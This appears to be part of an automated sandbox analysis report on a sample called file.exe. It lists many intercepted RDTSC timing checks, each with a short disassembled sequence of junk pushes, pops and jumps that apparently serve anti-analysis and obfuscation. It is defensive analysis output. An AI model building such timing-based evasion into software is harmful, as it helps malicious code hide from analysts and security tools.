                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892AEB second address: 892B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F7F1CE19AA8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 and bx, 1A73h 0x00000029 push 00000000h 0x0000002b mov bh, 3Fh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F7F1CE19AA8h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 clc 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007F7F1CE19AACh 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B0D second address: 893B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892D27 second address: 892D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894CD0 second address: 894CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E9DA4 second address: 8E9DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E9DAC second address: 8E9DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA09C second address: 8EA0A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA0A2 second address: 8EA0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007F7F1CE19AA6h 0x0000000d jmp 00007F7F1CE19AB9h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA0C9 second address: 8EA0F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F1D21A76Bh 0x00000008 jnp 00007F7F1D21A766h 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7F1D21A776h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA5BC second address: 8EA5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AB8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA9D2 second address: 8EA9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA9D6 second address: 8EA9DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5EE second address: 8EF5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5F7 second address: 8EF618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jnp 00007F7F1CE19AAEh 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF618 second address: 8EF61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7D51 second address: 8F7D88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB9h 0x00000007 jmp 00007F7F1CE19AAEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F7F1CE19AC4h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7D88 second address: 8F7D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7D8C second address: 8F7D9B instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F1CE19AA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6146 second address: 8F614A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F614A second address: 8F6159 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1CE19AA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F637D second address: 8F638A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F638A second address: 8F6390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F669D second address: 8F66A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6AE5 second address: 8F6AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6AE9 second address: 8F6B0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F7F1D21A766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1D21A773h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B0C second address: 8F6B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B1A second address: 8F6B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B20 second address: 8F6B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B25 second address: 8F6B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F7F1D21A772h 0x0000000d popad 0x0000000e je 00007F7F1D21A772h 0x00000014 jc 00007F7F1D21A766h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B4E second address: 8F6B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F1CE19AB4h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6E35 second address: 8F6E40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F7F1D21A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7BCF second address: 8F7BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB27A second address: 8FB280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB280 second address: 8FB28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB28B second address: 8FB299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007F7F1D21A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB299 second address: 8FB2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F7F1CE19AB0h 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2B0 second address: 8FB2BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7F1D21A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2BB second address: 8FB2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F7F1CE19AA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F7F1CE19AA6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2D2 second address: 8FB2D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC94D second address: 8FC97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB6h 0x00000009 popad 0x0000000a jng 00007F7F1CE19AB7h 0x00000010 jmp 00007F7F1CE19AB1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90199C second address: 9019D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1D21A766h 0x00000008 jc 00007F7F1D21A766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F7F1D21A770h 0x00000017 jmp 00007F7F1D21A76Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F7F1D21A766h 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901509 second address: 901512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901512 second address: 90151E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7F1D21A766h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90151E second address: 901522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901522 second address: 901526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903F25 second address: 903F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1CE19AB3h 0x0000000d jnl 00007F7F1CE19AA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E23B second address: 90E266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1D21A76Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F7F1D21A766h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910A55 second address: 910A9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7F1CE19AD3h 0x0000000e jmp 00007F7F1CE19AB9h 0x00000013 jmp 00007F7F1CE19AB4h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F1CE19AAAh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910BFA second address: 910C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C01 second address: 910C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C26 second address: 910C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C2A second address: 910C30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C30 second address: 910C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913441 second address: 913451 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1CE19AA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913451 second address: 913455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8435B9 second address: 8435D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F7F1CE19AD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F7F1CE19AA6h 0x00000013 js 00007F7F1CE19AA6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8435D2 second address: 8435E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E867 second address: 91E86D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E86D second address: 91E876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846BD5 second address: 846BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846BDA second address: 846C12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F7F1D21A76Dh 0x0000000f jc 00007F7F1D21A76Ch 0x00000015 jng 00007F7F1D21A766h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C12 second address: 846C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C16 second address: 846C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92599A second address: 9259A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9259A0 second address: 9259AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F7F1D21A76Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9259AD second address: 9259C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F7F1CE19AB4h 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92584C second address: 92585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F7F1D21A766h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92585F second address: 925863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E806 second address: 92E822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F1D21A76Fh 0x0000000c jg 00007F7F1D21A766h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D134 second address: 92D138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D2B0 second address: 92D2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D2B6 second address: 92D2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D2BA second address: 92D2C4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1D21A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D59B second address: 92D5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB0h 0x00000009 popad 0x0000000a ja 00007F7F1CE19AAEh 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007F7F1CE19AA6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F7F1CE19AAEh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5D2 second address: 92D5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F7F1D21A76Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5E5 second address: 92D5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5ED second address: 92D5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D90F second address: 92D924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D924 second address: 92D93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7F1D21A76Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D93D second address: 92D958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F7F1CE19AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7F1CE19AAFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DAA6 second address: 92DAC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7F1D21A779h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DAC9 second address: 92DB05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB1h 0x00000007 jmp 00007F7F1CE19AB4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7F1CE19AACh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DB05 second address: 92DB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DB0A second address: 92DB1E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1CE19AAAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F7F1CE19AA6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DB1E second address: 92DB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E526 second address: 92E52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E52A second address: 92E548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E548 second address: 92E54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 930EB9 second address: 930ECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C190 second address: 93C1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 jc 00007F7F1CE19AB3h 0x0000000f jmp 00007F7F1CE19AADh 0x00000014 pop ebx 0x00000015 push eax 0x00000016 jmp 00007F7F1CE19AABh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F1CE19AB3h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C1D8 second address: 93C1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 949839 second address: 94984A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F1CE19AAAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B49F second address: 95B4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B4A5 second address: 95B4B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F7F1CE19AA6h 0x00000012 rdtsc
